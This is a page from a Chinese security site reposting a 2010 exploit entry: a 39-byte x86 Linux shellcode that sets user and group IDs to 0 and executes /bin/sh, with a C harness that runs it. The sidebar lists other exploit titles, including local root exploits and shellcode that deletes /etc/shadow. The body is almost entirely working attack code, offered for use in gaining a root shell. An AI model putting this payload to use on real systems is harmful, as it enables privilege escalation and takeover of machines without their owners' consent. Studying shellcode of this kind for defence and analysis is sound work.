首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
来源:http://devilzc0de.org 作者:gunslinger_ 发布时间:2010-06-02  

/*
Name   : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date   : Tue Jun  1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>

char *shellcode=
  "\xeb\x19"                    /* jmp    0x804807b */
  "\x31\xc0"                    /* xor    %eax,%eax */
  "\xb0\x17"                    /* mov    $0x17,%al */
  "\x31\xdb"                    /* xor    %ebx,%ebx */
  "\xcd\x80"                    /* int    $0x80 */
  "\x31\xc0"                    /* xor    %eax,%eax */
  "\xb0\x2e"                    /* mov    $0x2e,%al */
  "\x31\xdb"                    /* xor    %ebx,%ebx */
  "\xcd\x80"                    /* int    $0x80 */
  "\x31\xc0"                    /* xor    %eax,%eax */
  "\xb0\x0b"                    /* mov    $0xb,%al */
  "\x5b"                        /* pop    %ebx */
  "\x89\xd1"                    /* mov    %edx,%ecx */
  "\xcd\x80"                    /* int    $0x80 */
  "\xe8\xe2\xff\xff\xff"        /* call   0x8048062 */
  "\x2f"                        /* das     */
  "\x62\x69\x6e"                /* bound  %ebp,0x6e(%ecx) */
  "\x2f"                        /* das     */
  "\x73\x68"                    /* jae    0x80480ef */
  "";

int main(void)
{
  fprintf(stdout,"Length: %d\n",strlen(shellcode));
  ((void (*)(void)) shellcode)();
  return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OS X EvoCam Web Server Buffer
·linux/x86 sys_sync shellcode 6
·XFTP 3.0 Build 0239 Long filen
·linux/x86 "high" frequency sys
·55 bytes sys_execve("/bin/sh",
·linux/x86 "low" frequency syst
·45 bytes sys_execve("/bin/sh",
·58 bytes sys_setdomainname ("t
·38 bytes sys_mkdir("/tmp/dir",
·33 bytes unlink "/etc/shadow"
·41 bytes sys_rmdir("/tmp/willd
·change mode 0777 of "/etc/pass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved